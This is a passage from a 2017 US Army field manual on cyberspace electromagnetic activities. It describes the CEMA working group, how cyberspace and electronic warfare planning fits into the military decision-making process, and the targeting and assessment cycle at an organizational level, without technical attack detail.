actions into the concept of operations. CEMA working groups do not add additional structure to an existing 
organization. The CEMA working group is led by the EWO to analyze, coordinate, and provide 
recommendations for a particular purp ose, event, or function. Deletions or modifications to the CEMA 
working group staff are based on requirements. See figure 3 -2 on page 3 -11 for an outline of the functions of 
the CEMA working group. The CEMA working group augments the function of the staff executing CEMA.   
Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-11 Figure 3 -2. Cyberspace electromagnetic activities  working group organization  
ROLES IN THE CYBERSPACE ELECTROMAGNETIC ACTIVITIES  WORKING GROUP  
3-33. The CEMA working group is responsible for coordinating horizontally and vertically to support unified 
land operations and will primarily deconflict detection and delivery assets through the planning and targeting 
processes. Staff representation within the CEMA working group may include the G -2 (S-2), G-3 (S-3), G-6 
(S-6), assistant chief of staff, civil affairs operations  G-9 (S-9), fire support coordinator, IO officer, space 
support element, legal advisor, and a joint terminal attack controller when assign ed. (See table 3 -1 on page 
3-12.) Deletions or modifications to the CEMA working group staff are based on requirements for certain 
capabilities and assets. When scheduled, the CEMA working group is a critical planning event integrated 
into the staff’s batt le rhythm.  
  

Chapter 3   
3-12 FM 3-12 11 April 2017  Table 3 -1. Tasks of the cyberspace electromagnetic activities  working group  
CEMA Working Group 
Participants  CEMA Working Group Functions  
Division and above  
Airspace Management 
/brigade aviation element  
ALO 
EWO  
G-2 
G-3 
G-5 
G-6 
G-9 
IO Officer  
FSCOORD  
JAG 
KMO  
LNOs  
Spectrum manager  
Space support element  
STO  Plan, integrate , and synchronize cyberspace and EW operations  to support  
operations or command requirements.  
 Plan and nominate targets within cyberspace and the EMS to achieve effects that 
support the commander’s intent.  
 Develop and integrate cyberspace and EW operations  actions into operations plans 
and operational concepts.  
 Develop information to support planning (joint restricted frequency list, spectrum 
management, and deconfliction).  
 Develop and promulgate CEMA policies and support higher -level policies.  
 Identify and coordinate intelligence support requirements for CEMA . 
 Maintain current assessment of resources available to the commander for 
cyberspace and EW operations . 
 Prioritize effec ts and targets for functions and capabilities within cyberspace and the 
EMS . 
 Predict effects of friendly and enemy  cyberspace and EW operations . 
 Plan and submit measures of performance and effectiveness information 
requirements to intelligence section . 
 Identify the measures of effectiveness for cyberspace and EW operations . 
 Coordinate spectrum management and radio frequency deconfliction with G -6 and J -
6. 
 Plan, assess, and implement friendly electronic security measures.  
 Ensure  cyberspace and EW operations actions  comply with applicable policy and 
laws.  
 Identify civilian and commercial cyberspace and EW operations related capacity and 
infrastructure within the area of operations.  
Brigade  
ADAM/BAE  
ALO 
EWO  
FSCOORD  
JAG 
KMO  
S-2 
S-3 
S-6 
S-9 
IO Officer  
LNOs  
Spectrum manager  
  Develop and integrate cyberspace and EW actions into operation plans and 
exercises.  
 Support CEMA policies.  
 Plan, prepare, execute, and assess cyberspace and EW operations . 
 Integrate intelligence preparation of the battlefield into the ope rations process.  
 Identify and coordinate intelligence support requirements for BCT and subordinate 
units’ cyberspace and EW operations . 
 Assess offensive and defensive requirements for cyberspace and EW operations.  
 Maintain current assessment of cyberspace and EW resources available to the unit.  
 Nominate and submit approved targets within cyberspace to division.  
 Prioritize BCT targets within cyberspace and the EMS . 
 Plan, coordinate, and assess friendly CEMA.  
 Implement friendly electronic and network security  measures (for example, 
electromagnetic spectrum mitigation and network protection).  
 Ensure  cyberspace and EW operations actions comply with applicable policy and 
laws.  
 Identify civilian and commercial cyberspace and EMS -related capacity and 
infrastructure  within the area of operations.  
ADAM/BAE air defense airspace management /brigade aviation element     G-9   assistant chief of staff, civil affairs 
operations   
ALO       air liaison officer                                                                                 IO         information operations                                                            
BCT       brigade combat team                                                                         JAG      judge advocate general   
CEMA    cyber space  electromagnetic activities                                               J-6        communications directorate of a joint 
staff  
EMS       electromagnetic spectrum                                                                 KMO     knowledge management officer  
EW         electronic warfare                                                                              LNO      liaison officer   
EWO      electronic war fare officer                                                                   NCO      noncommissioned officer   
FSCOORD fire support coordinator                                                                 STO      special technical operations   
G-2        assistant chief of staff, intelligence                                                  S-2        intelligence staff officer  
G-3        assistant chief of staff, operations                                                   S-3        operations  staff officer  
G-5        assistant chief of staff, plans                                                           S-6        signal staff officer  
G-6        assistant chief of staff, signal                                                          S-9        civil affairs officer  
 
Battalion  
3-35. Battalions rely on their brigade for core services, network accessibility, and network defense. The 
battalion S -6 performs the planning and operations associated with the main and tactical command posts, 
Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-13 including establishing connectivity with adjacent, subordinate, and higher elements. Currently, battalions do 
not have organic capabilities to plan and integrate  all aspects of cyberspace operations.  Battalions do have 
capabilities to support cybersecurity policies  and request for information regarding cyberspace and the EMS.  
Company  
3-36. Companies rely on their battalion for network service, access, and network defense. The company 
performs the planning and operations associated with the command post, including establish ing connectivity 
with adjacent, subordinate, and higher elements.  Commanders at this echelon are responsible for applicable 
cybersecurity measures.  
PLANNING  AND CYBER SPACE  ELECTROMAGNETIC ACTIVITIES  
3-37. The commander and staff include the cyberspace planner during the MDMP for operations. The 
cyberspace planner is the subject matter expert to create effects in cyberspace and the EMS, with 
considerations from the CEMA section. Involving the cyberspace plan ner early in development of the 
commander’s vision and planning allows for synchronization and integration with missions, functions, and 
tasks. A consideration of cyberspace operations is the lead time required for effects support. Early 
involvement, inclu sion in operations orders  preparation , and effects approval early in the process enhance 
the possibility of effects in cyberspace and the EMS supporting an operation.  The two primary methodologies 
commanders and staffs use for planning cyberspace and EW op erations are the Army design methodology 
and the MDMP.  
3-38. Planning  is the art and science of understanding a situation, envisioning a desired future, and laying 
out effective ways of bringing that future about (ADP 5 -0). Planning is one of the four major acti vities of 
mission command that occurs during operations process (plan, prepare, execute, and assess). Commanders 
apply the art of command and the science of control to ensure cyberspace  and EW  operations support the 
concept of operations.  
3-39. The full scope o f planning for cyberspace and EW operations is not addressed by the Army design 
methodology or the MDMP. These methodologies will allow Army forces to determine where and when 
effects in cyberspace and EW can be integrated to support the concept of operati ons. Army forces plan, 
prepare, execute, and assess cyberspace and EW operations in collaboration with the joint staff and other 
joint, interorganizational, and multinational partners as required. Whether cyberspace and EW operations are 
planned and direct ed from higher headquarters or requested from tactical units, timely staff actions and 
commander's involvement coupled with continued situational awareness of cyberspace and the EMS  are 
critical for mission success.  
3-40. Army commanders and staffs will likely c oordinate or interact with joint forces to facilitate cyberspace 
operations. For this reason, commanders and staffs must have an awareness of joint planning systems and 
processes that facilitate cyberspace operations. Some of these processes and systems in clude the — 
 Joint Operations Planning Process (see JP 5 -0). 
 Adaptive Planning and Execution System (see JP 5 -0). 
 Review and Approval Process Cyberspace Operations (see CJCS Manual 3139.01 and appendixes 
A and C).  
ARMY DESIGN METHODOLOGY INCLUDING CYBERSPACE  AND ELECTRONIC WARFARE 
OPERATIONS  
3-41. The Army design methodology  is a methodology for applying critical and creative thinking to 
understand, visualize, and describe unfamiliar problems and approaches to solving them (ADP 5 -0). Given 
the unique and complex nature of cyberspace, commanders and staffs benefit from implementing the Army 
design methodology  to guide more detailed planning during the MDMP . This entails framing an operational 
environment, framing a problem, and develop ing an operational approach to solve the problem. (See ATP 5 -
0.1 for additional information on the Army design methodology.)  
3-42. Framing an operational environment involves critical and creative thinking by a group to build models 
that represent the current co nditions of the operational environment (current state) and models that represent 
Chapter 3   
3-14 FM 3-12 11 April 2017  what the operational environment should resemble  at the conclusion of an operation (desired end state). A 
planning team designated by the commander will define, analyze, and synthesize characteristics of the 
operational and mission variables and develop desired future end states. Cyberspace should be considered 
within this framing effort for opportunities as they envision desired end states.  
3-43. Framing a problem involves understa nding and isolating the root causes of conflict discussed and 
depicted in the operational environment frame. Actors may represent obstacles for commanders as they seek 
to achieve desired end states. Creating and e mploying cyberspace capabilities shapes con ditions in the 
operational environment supporting the commander’s objectives.  
THE MILITARY DECISION -MAKING PROCESS W ITH CYBERSPACE A ND ELECTRONIC 
WARFARE OPERATIONS  
3-44. Cyberspace and EW operations planning is integrated into  MDMP, an iterative planning methodology 
to understand the situation and mission, develop a course of action ( COA ), and produce an operation plan or 
order (ADP 5 -0). The commander and staff integrate cyberspace and EW  operations throughout the MDMP. 
They ensure courses of action are supported by the scheme of cyberspace operations and meet requirements 
for suitability, feasibility, and acceptability. Staff members responsible for planning and integrating 
cyberspace ope rations participate in the MDMP events and CEMA working groups.  
3-45. The MDMP consists of the following seven steps — 
 Step 1: Receipt of mission.  
 Step 2: Mission analysis.  
 Step 3: COA development.  
 Step 4: COA analysis.  
 Step 5: COA comparison.  
 Step 6: COA approval.  
 Step 7: Orders production, dissemination, and transition.  
Receipt of Mission  
3-46. Commanders initiate the MDMP upon receipt or in anticipation of a mission. Staff members 
responsible for planning an d integrating cyberspace and EW operations initiate coordination with higher 
headquarters staff counterparts to obtain information on current and future cyberspace and EW operations, 
running estimates, and other cyberspace and EW operations planning produc ts. Table 3 -2 on page 3 -15 
explains  cyberspace and EW operations planning inputs, actions, and outputs  for step 1 .  
Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-15 Table 3 -2. The military decision -making process, step  1: receipt of mission  
 
Higher headquarters plan or 
order  
Planning products from high er 
headquarters including  the 
cyberspace effects running 
estimate  Begin updating the cyberspace 
effects and electronic warfare 
running estimates  
Gather the tools to prepare for 
mission analysis specific to 
cyberspace operations  
Provide cyberspace and 
electronic warfare operations 
input for formulation of the 
commander’s initial guidance and 
the initial warning order  Updated cyberspace effects and 
electronic warfare running 
estimate  
Mission Analysis  
3-47. Commanders and staffs perform  mission analysis to better understand the situation and problem, 
identify what the command must accomplish, when and where it must be done, and why (the purpose of the 
operation). Staff members responsible for planning and integrating cyberspace and EW op erations gather, 
analyze, and synthesize information on current conditions of the operational environment with an emphasis 
on cyberspace, the EMS, and the information environment.  
3-48. The Army design methodology may have been perform ed before  the MDMP, schedul ed to occur in 
parallel with the MDMP, or it may not be fulfilled  at all. Army design products, if and when available, should 
be reviewed by the commander and staff to enhance situational understanding and for integration into the 
MDMP.  
3-49.  Intelligence prepa ration of the battlefield  is the systematic process of analyzing the mission variables 
of enemy, terrain, weather, and civil considerations in an area of interest to determine their effect on 
operations  (ATP 2 -01.3) . (See ATP 2 -01.3 for additional informat ion on the IPB.) Intelligence support to 
cyberspace and EW operations begins with the IPB and continues throughout the operations process. Staff 
members responsible for planning cyberspace operations will coordinate with the intelligence staff to identify 
enemy and  adversary capabilities  and their use of cyberspace and the EMS  to assist in the development of 
models, situation templates, event templates, high -value targets, named areas of interest, and other outputs 
from the intelligence process, which inclu de enemy  and adversary cyberspace information. Table 3 -3 on page 
3-16 describes  cyberspace operations planning inputs, actions, and outputs  for step 2 . 

Chapter 3   
3-16 FM 3-12 11 April 2017  Table 3 -3. The military decision -making process, step 2: mission analysis  
 
Commander’s initial guidance  
Army design methodology 
product  
Higher headquarters’ plan s, 
order s, or knowledge products  Analyze inputs and develop 
information requirements  
Participate in the intelligence 
preparation of the battlefield 
process  
Identify and develop high -value 
targets  
Identify vulnerabilities of friendly, 
enemy, adversary, and neutral 
actors  
Determine cyberspace and 
electronic warfare operations 
specified , implied , and  essential 
tasks  
Determine cyberspace 
operations limitations and 
constraints  
Identify cyberspace critical facts 
and assumptions  
Identify and nominate 
cyberspace related commander’s 
critical information requirements  
Identify and nominate 
cyberspace critical  information  
Provide input to the combined 
information overlay  
Provide input  for the 
development of the mission 
analysis brief and warning order  
Participate in the mission 
analysis brief  List of cyberspace information 
requirements  
Intelligence preparation of the 
battlefield pro ducts  to support 
cyberspace and electronic 
warfare ope rations  
Most likely and most dangerous 
enemy courses of action  
List of cyberspace operations 
specific and implied tasks  
List of cyberspace limitations and 
constraints  
List of cyberspace assumptions  
Updated cyberspace operations 
running estimate  
Course of Action Development  
3-50. COA development generates options for subsequent analysis and comparison that satisfy the 
commander’s intent and planning guidance. Staff members responsible for planning and integrati ng 
cyberspace operations apply knowledge gained from the mission analysis step to help with overall COA 
development. During COA development, staff members responsible for planning cyberspace and EW 
operations develop an initial scheme of cyberspace and EW operations consisting of cyber space  support 
tasks. The scheme of cyberspace and EW operations describes how the commander intends to use cyberspace 
operations to support the concept of operations with an emphasis on the scheme of maneuver. Table 3 -4 on 
page 3-17 lists cyberspace and EW operations planning inputs, actions, and outputs  for step 3 . 

Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-17 Table 3 -4. The military decision -making process, step 3: course of action  development  
 
Initial commander’s planning 
guidance , mission, and intent  
Initial commander’s critical 
information requirements  
Updated intelligence preparation 
of the battlefield products  
Updated cyberspace effects and 
electronic warfare running 
estimates  
Higher headquarters’ plans, 
orders, or knowledge products  Develop information  
requirements for the information 
collection plan  
Integrate and synchronize 
cyberspace operations into the 
scheme of maneuver and 
concept of operations  
Analyze high -value targets and 
develop a list of tentative high -
payoff targets  
Provide cyberspace input for the 
combined information overlay  
Develop initial scheme of 
cyberspace and electronic 
warfare operations  
Provide cyberspace operations 
and electronic warfare input for 
the development of the course of 
action development brief  
Begin development of cyber 
effects request format  
Begin development of electronic 
attack request format  
Submit cyber effects request 
format (if sufficient guidance on 
COAs exist)  Updated cyberspace operations 
and electronic warfare 
information requirements  
Cyberspace operations init ial 
input for high -payoff target list 
and target folders  
Draft scheme of cyberspace 
operations  including  objectives 
and effects  
Updated cyberspace operations 
running estimate  
3-51. Upon completion of COA development, many outputs from the mission analysis shoul d be updated 
such as the cyberspace and EW operations -related input for the commander’s critical information 
requirements and essential elements of friendly information. The staff updates the portions of the operations 
orders, including  annexes and appendi xes that contain cyberspace and EW operations information . (See 
Appendix B  for an example of  operations order s.) 
Course of Action Analysis  
3-52. COA analysis enables commanders and staffs to identify difficulties or coordination problems as well 
as probable consequences of planned actions for each COA under consideration. Staff members responsible 
for planning and integrating cyberspace and EW operations use the draft products from COA development 
to participate in COA analysis. During COA analysis, they refine their scheme of cyberspace and EW 
operations, ensuring that it nests with the scheme of maneuver.  
3-53. Upon completion of COA analysis, operational planning continues with drafting and submitting the 
CERF and then updating these requests when the COA is later refined. Development and submission of the 
CERF is one method by which Army forces request, coordin ate, and integrate effects to support  cyberspace 
and EW operations. The CERF contains baseline information for coordinating and integrating effects in 
cyberspace and EW. Table 3 -5 on page 3 -18 describes  cyberspace and EW operations planning inputs, 
actions , and outputs  for step 4 . 

Chapter 3   
3-18 FM 3-12 11 April 2017  Table 3 -5. The military decision -making process, step 4: course of action  analysis  
 
Revised commanders planning 
guidance  
Cyberspace operations and 
electronic warfare initial 
requirements for high -payoff 
target list and supportin g target 
folders  
Draft scheme of cyberspace 
operations  
Updated cyberspace effects and 
electronic warfare running 
estimates  
Higher headquarters’ plans, 
orders, or knowledge products  
Feedback from submitted cyber 
effects request formats  Provide cyberspace op erations 
and input and participate in the 
war-game briefing as required  
Develop cyber effects request 
format  
Develop input for electronic 
attack request format  
Continue development of scheme 
of cyberspace operations  
Provide cyberspace operations 
and electronic warfare input for 
the development of the decision 
support matrix and decision 
support template  
Provide refined cyberspace 
operations and electronic warfare 
input to the combined information 
overlay  Refined cyberspace and 
electronic warfare input  to 
commander’s critical information 
requirements  
Refined cyberspace operations 
and electronic warfare input to 
the high -payoff targets list  
Refined scheme of cyberspace 
operations  
Updated cyberspace effects and 
electronic warfare running 
estimate  
Course of Action Comparison  
3-54. COA comparison is an objective process to evaluate each COA independently and against set 
evaluation criteria approved by the commander and staff. Staff members responsible for cyberspace and EW 
operations may not be directly involved in this process, but will provide recommendations for consideration 
during th e process. Upon completion of the COA comparison, output products and the base operation order, 
become final draft. Table 3 -6 on page 3 -19 lists cyberspace and EW operations planning inputs, actions, and 
outputs  for step 5 . 

Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-19 Table 3 -6. The military decision -making process, step 5: course of action  comparison  
 
War-game results  
Refined cyberspace operations 
and electronic warfare input to 
commander’s critical information 
requirements  
Refined cyberspace operations 
and electronic warfare input to 
the high-payoff target list  
Refined scheme of cyberspace 
operations  
Updated cyberspace effects and 
electronic warfare running 
estimate  
Higher headquarters’ plans, 
orders, or knowledge products  
Feedback from submitted cyber 
effects request formats  Conduct an an alysis of 
advantages and disadvantages 
for each course of action  
Provide cyberspace operations 
input to the decision matrix tool 
as required  
Provide cyberspace operations 
input for the risk assessment 
(collateral effects evaluations)  
Develop recommendation  for the 
most supportable course of 
action from a cyberspace 
operations perspective  
Provide cyberspace and 
electronic warfare operations 
input for the development of the 
course of action decision  brief as 
required  Recommended course of action  
Updated cyberspace effects 
running estimate  
Course of Action Approval  
3-55. During COA approval the commander selects the COA to best accomplish the mission. The best COA 
must first be ethical, and then the most effe ctive and efficient possible. The commander will issue final 
planning guidance including  refined commander’s intent, commander’s critical information requirements, 
and any additional guidance on priorities for the warfighting functions. Table 3 -7 on page 3 -20 describes  
cyberspace and EW operations planning inputs, actions, and outputs  for step 6 . 

Chapter 3   
3-20 FM 3-12 11 April 2017  Table 3 -7. The military decision -making process, step 6: course of action  approval  
Orders Production, Dissemination, and Transition  
3-56. The final step of the MDMP is orders production, dissemin ation, and transition. All planning products 
are finalized including  the cyberspace and EW operations running estimate and CERF. As time permits, the 
staff may conduct a more detailed war game of the selected COA. Outputs are internally reconciled and  
Updated cyberspace effects 
running estimate including  refined 
products for each course of 
action  
Evaluated courses of action  
Recommended course of action  
Higher headquarters’ plans, 
orders, or knowledge products  
Feedback from submitted cyber 
effects request formats  Receive and respond to final 
planning guida nce from the 
commander  
Assess implications and take 
actions to revise operation order 
products  
Finalize and submit cyber effects 
request formats  
Finalize and submit input for 
electronic attack request format  
Finalize scheme of cyberspace 
operations  Command er approved course of 
action  
Final draft Tab A ( Offensive 
Cyberspace Operations ) to 
Appendix 12 (Cyber space  
Electromagnetic Activities) to 
Annex C (Operations)  
Final draft Tab B (Defensive 
Cyberspace Operations) to 
Appendix 12 (Cyber space  
Electromagnetic A ctivities) to 
Annex C (Operations)  
Final draft Tab C (Electronic 
Attack) to Appendix 12 
(Cyberspace Electromagnetic 
Activities) to Annex C 
(Operations)  
Final draft Tab D (Electronic 
Protect) to Appendix 12 
(Cyberspace Electromagnetic 
Activities) to Annex C  
(Operations)  
Final draft Tab E (Electronic 
Warfare Support) to Appendix 12 
(Cyberspace Electromagnetic 
Activities) to Annex C 
(Operations)  
Final draft cyberspace operations 
input to Appendix 1 (Defensive 
Cyberspace Operations) to 
Annex H (Signal)  
Final draft cyberspace operations 
input to Appendix 2 (DODIN  
Operations ) to Annex H (Signal)  
Final cyberspace operations input 
to Annex B (Intelligence) and 
Annex L (Information Collection)  
Nominated targets in cyberspace 
and the EMS  
Updated intelligence preparation 
of the battlefield products to 
support cyberspace and 
electronic warfare operations  

Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-21 approved by the commander. Table 3 -8 details cyberspace and EW operations planning inputs, actions, and 
outputs  for step 7 . 
Table 3 -8. The military decision -making process, step 7: orders production, dissemination, 
and transition  
 
Commander -approved course of 
action and any modifications  
Final draft operation s order 
products  
Higher headquarters’ plans, 
orders, or knowledge products  
Feedback from submitted cyber 
effects request formats  Participate in the staff plans and 
orders reconciliation as required  
Participate in the staff plans and 
orders crosswalk as required  
Provide final input to the risk 
assessment specific to 
cyberspace operations  
Finalize and submit cyber effects 
request formats  
Finalize and submit input for 
evaluation request messages as 
required  
Produce operations order 
products  
Participate in the operations 
order brief and confirmation brief 
as required  Final Tab A (Offensive 
Cyberspace Operations) to 
Appendix 12 (Cyber space  
Electromagnetic Activities) to 
Annex C (Operations)  
Final Tab B (De fensi ve 
Cyberspace Operations ) to 
Appendix 12 (Cyber space  
Electromagnetic Activities) to 
Annex C (Operations)  
Final Tab C (Electronic Attack) to 
Appendix 12 (Cyberspace 
Electromagnetic Activities) to 
Annex C (Operations)  
Final Tab D (Electronic Protect) 
to Appendix 12 (Cyberspace 
Electromagnetic Activities) to 
Annex C (Operations)  
Final Tab E (Electronic Warfare 
Support) to Appendix 12 
(Cyberspace Electromagnetic 
Activities) to Annex C 
(Operations)  
Final cyberspace operations input 
to Appendix 1 (Defensive 
Cyberspace Operations) to 
Annex H (Signal)  
Final cyberspace operations input 
to Appendix 2 (DODIN  
Operations ) to Annex H (Signal)  
Final cyberspace operations input 
to Annex B (Intelligence) and 
Annex L (Information Collection)  
CYBER EFFECTS REQUES T FORMAT  AND T ARGETING 
ACTIVITIES  
3-57. Targeting  is the process of selecting and prioritizing targets and matching the appropriate response to 
them, considering operational requirements and capabilities (JP 3 -0). Targeting is an integrating and iterat ive 
process that occurs throughout the major activities of the operations process. The functions of decide, detect, 
deliver, and assess define the targeting process  and occur simultaneously and sequentially during the 
operations process. Targeting activiti es for cyberspace and EW operations which involve the employment of 
cyberspace and EW effects closely follow standard targeting processes.   
3-58. Targets identified through the operations process appear on the integrated target list. Organic 
cyberspace and EW ca pabilities, with the proper authority, may fulfill the desired effect on the target. Time 

Chapter 3   
3-22 FM 3-12 11 April 2017  and synchronization issues may affect the decision to use organic assets as well as the legal and operational 
authorities. The capability to affect targets may requir e proximity of capabilities and operational reach access.  
3-59. If the unit’s organic capabilities or authorities do not fulfill the targeting requirements to support the 
commander’s intent, they request support from the next higher echelon. As requests pass fro m echelon to 
echelon, each unit processes the target packet or request to use organic capabilities and authorities to support 
the subordinate unit’s requirement. The requirement elevates until it reaches an echelon that can support the 
requirement with the  appropriate capabilities and authority, or the request for targeting is denied. Fulfilling 
cyberspace and EW effects requests on targets may not be possible due to prioritization, timing, capabilities, 
authorization, or conflict with other cyberspace and EW capability requirements.  
3-60. Identifying targets early in the planning  process is key to approval and synchronization. Integrating the 
targets into the normal targeting process identifies if the organic capabilities can achieve the desired effects. 
Due to t heir impact, some cyberspace and EW effects delivery capabilities (such as EA) require 
synchronization and coordination across the entire staff. Some effects may prohibit friendly use of cyberspace 
and EW, knowingly or inadvertently, and the situation al awareness of the cyberspace and EW operation will 
enable the staff in taking the appropriate remediation actions and decisions.  
3-61. OCO and EW t argets not available for effects through Army means may continue to joint echelons for 
processing. The targets may require additional joint force cyberspace or EW assets to support the Army 
commander mission. This could result in the corps and below targets being included on the joint integrated 
prioritized target list.  In addition , targets developed with the initial i ntention  to employ cyberspace and EW 
effects may be struck with lethal fires or engaged through other non -lethal means.  
3-62. In table 3 -9 on page 3 -23, targets are described as systems with components and subcomponents that 
enable the determination of aimpoint s for designated friendly force capabilities. An aimpoint  is a point 
associated with a target and assigned for a specific weapon impact (JP 3 -60). To develop targets suitable for 
effects created  by a cyberspace attack requires a concerted  staff effort focused on IPB, cyber -enabled 
intelligence, the targeting process, and cyberspace information collection.  Ultimately, decisions to  employ 
cyberspace attack capabilities alone or with other capabilities will be determined by  commanders, with t he 
assistance of their staffs, throughout the operations process.   
Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-23 Table 3 -9. Examples of simultaneous and complimentary effects  
Target  
Description  Target System  
Components  System 
Subcomponent  
Aimpoint  Desired Effects  
by Various Army Capabilities  
Integrat ed air  
defense forces  Early warning 
radars  Supporting network  Destroy (primary equipment)  
Disrupt (cueing flow)  
Degrade (sensor integrity)  
Deceive (operators and leadership)  
Support facilities  Public switched 
telephone network  Destroy (supporting nodes)  
Disrupt (command and control  systems)  
Deny (secondary battery access)  
Enemy safe  
haven  Virtual locations  Host server  Destroy (supporting nodes)  
Exploit (data and information)  
Degrade (content)  
Disrupt (data flow)  
Deceive (through false bonafides)  
Key personnel 
(for example, 
leaders, 
facilitators, and 
enablers)  Smartphone  Disrupt (command and control systems)  
Deny (access)  
Deceive (through false persona)  
DECIDE  
3-63. Decide  is the first step in the targeting process. It begins with the MDMP. It does not end when the 
plan is completed; the decide function continues throughout the operation. Using the outputs from the 
planning process, commanders and staffs determine where and  when effects in designated cyberspace should 
be created to support  the concept of operations. Targeting has an initial focus on enemy and adversary 
networks.  
3-64. Due to the nature of cyberspace operations, commanders should allow as much planning time as 
possible when requesting effects through cyberspace. Army commanders are encouraged to consider 
cyberspace  and EW effects during the targeting process.  
3-65. The characteristics of cyberspace and the EMS provide enemies  and adversaries with considerable 
measures of anonymity. Information collection is critical for identifying potential enemies  or adversaries in 
cyberspace. Designating targets that reside within cyberspace and the EMS depends heavily on the 
information collection effort. Each designated target is assi gned to the most appropriate means to achieve the 
desired effect , which may include lethal fires.  
3-66. An important part of this step in the targeting process is identifying potential adverse impacts and 
mitigating them. This requires coordination and synchroni zation on the part of the staff executing CEMA. 
Any action in cyberspace and the EMS, either offensive or defensive, must be coordinated and balanced with 
potential degradation inflicted on friendly systems. The SMO  enabling  component to CEMA are leveraged  
to ensure that EA does not cause unwanted interference on friendly systems or degrade friendly networks.  
3-67. During the decide step, the staff develops information regarding cyberspace and EW targets by 
asking — 
 What targets should be affected?  
 When and where are the targets likely to be identified, accessed , or otherwise engaged to create 
desired effects?  
Chapter 3   
3-24 FM 3-12 11 April 2017   How long will the targets remain accessible?  
 What are the related information collection requirements essential to the targeting effort; and how 
and when mus t the information be collected, processed, and disseminated?  
 When, where, how, why, and in what priority should the targets be affected?  
 What are the measures of performance and measures of effectiveness?  
 What or who will obtain assessment or other informa tion required for determining the success or 
failure of each engagement of target nodes? Who must receive and process that information, how 
rapidly, and in what format?  
DETECT  
3-68. Detect  is the next critical function in targeti ng. The information collection plan is a critical component 
of the detect function. Information requirements in cyberspace are considered throughout the intelligence 
process and the G -2 (S-2) serves a key role in developing and managing the information col lection plan 
specific to cyberspace.  
3-69. The detailed analysis of cyberspace provides information as network topology, configuration, and 
enemy and adversary actions. During this step units gather the information needed to gain access, pair a 
capability, and d evelop the necessary intelligence to vet a nd validate nominated targets. After analysis, it 
may be possible to determine enemy intentions, when combined with other information. Situational 
understanding of the EMS is attained through situational data as geospatial location, signal strength, system 
type, and frequency of target to focus effects on the intended target.  
3-70. The detect function includes tasks in and through specific portions of cyberspace or the EMS to locate, 
track, and validate targets or follow on action by friendly forces. Target development, vetting, and validation 
are implemented in parallel with the information collection plan.  
DELIVER  
3-71. The CEMA section, through the targeting process, ensures the full c oordination, integration, 
deconfliction, and employment of cyberspace and EW effects according to  the commander’s scheme of 
maneuver. Close coordination between collection assets and delivery assets is critical during the engagement 
to avoid unintended eff ects and enable the assessment phase.  
3-72. Attack guidance for target is initiated because  of the detection function and executed as planned. Close 
coordination is required between those engaged in detecting targets and those engaged in delivering effects 
upon targets . Integration and synchronization is vitally important during the deliver step.  
ASSESS  
3-73. Assess ment  occurs throughout the operations process. Targeting in cyberspace is continually refined 
and adjusted between the comm ander and staff during the operation. Assessment in cyberspace provides 
information on the effectiveness of decide and detect functions and whether the targets need reengaging. 
Although assessment is discussed as a final step in the operations process, it also informs and guides the other 
activities of the operations process. Assessment involves deliberately comparing forecasted outcomes with 
actual events to determine the overall effectiveness of force employment. Measures of performance and 
measures of ef fectiveness are key activities during assessment.  
Note . Commanders should be aware that full assessment of effects in cyberspace may be more 
complex due  to the nature of cyberspace operations.  
3-74. Effects produced in cyberspace  are not always physically visibl e or apparent. In certain cases, 
intelligence processing, exploitation, and dissemination may provide the raw data. This data is converted into 
information that then supports the execution of CEMA. In some cases, intelligence is available for immediate 
use by tactical forces. Intelligence is the primary contributor to the assessment of effects on enemies and 
adversaries and their reactions to counter these effects. Intelligence allows for th e adjustment of the targeting 
process. (For more information on intelligence, see ADRP 2 -0, FM 2 -0, and ATP  2-01.3.)  
Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-25 3-75. Commanders and staffs continually assess operations by using measures of performance and measures 
of effectiveness. A measure of performanc e is a criterion used to assess friendly actions tied to measuring 
task accomplishment. A measure of effectiveness is a criterion used to assess changes in system or enemy 
behavior, capability, or operational environment. A measure of effectiveness is an i dentifiable and 
measureable event or action which tells the commander that the action taken had the desired effect. The 
action was effective.  
3-76. Measures of performance  help answer the following questions — 
 Was the action taken ? 
 Were the tasks completed to standard?  
3-77. Examples of measures of performance may include the following — 
 Were DCO -IDM  conducted in response to detected intrusions? What types, on what networks, 
and how many times per day?  
 Was the adversary  contained and clea red to or from the designated location  (DCO -IDM )? 
 Did the sensors get put in place to monitor traffic  (screening operations )? 
 Did the sensors cover the suspected adversary entry points into the network?  
3-78. Assessment of effectiveness may occur external to the  requesting organization. The effectiveness of a 
requested effect may not be realized by the requester. A measure of effectiveness is a criterion used to assess 
changes in system behavior, capability, or operational environment that is tied to measuring th e attainment 
of an end state, achievement of an objective, or creation of an effect (JP 3 -0). Measures of effectiveness  help 
measure changes in conditions, both positive and negative.  
3-79. Measures of effectiveness  help answer the following — 
 Was the purpose accomplished?  
 Measures the why in the mission statement . 
3-80. Examples of measures of effectiveness may include the following — 
 Were there any valid intrusion s on critical networks?  
 Did OCO have the intended effect?  
 Did the target  change behavior ? 
 
This page intentionally left blank.   
 
11 April 2017  FM 3 -12 A-1 Appendix A  
Integration with Unified Action Partners  
Army forces conduct operations as part of a joint, interdependent force. In addition, 
they routinely work with multinational forces and interagency, intergovernmental, and 
nongovernmental partners as part of unified action. As such, Army commander s must 
work with unified action partners throughout the operations process. This chapter 
discusses how commanders and staffs integrate cyberspace electromagnetic activities 
with unified action partners.  
JOINT OPERATIONS CONSIDERA TIONS  
A-1. Army operations that involve the use of cyberspace and the EMS can have joint implications. Each 
Service component has cyberspace operations, EMS requirements, and EW capabilities that contribute to an 
integrated whole, synchronized by a joint force he adquarters. The CEMA section ensures that cyberspace 
and EW operations  align with joint IO, cyberspace operations , EW, SMO, and doctrine.  
A-2. Army units may work as subordinate elements of a joint task force or form the core headquarters of a 
joint task force . The Army uses its CEMA section  to integrate cyberspace and EW operations into the joint 
operations planning process. The integration of these capabilities into operations occurs at the IO working 
group, at the joint spectrum management element in the com munications directorate of a joint staff for SMO, 
and for EW that may occur at the joint EW cell in the joint force headquarters. When transitioning to become 
a part of a joint task force, an Army unit has the option of maintaining the CEMA section  separat ely from 
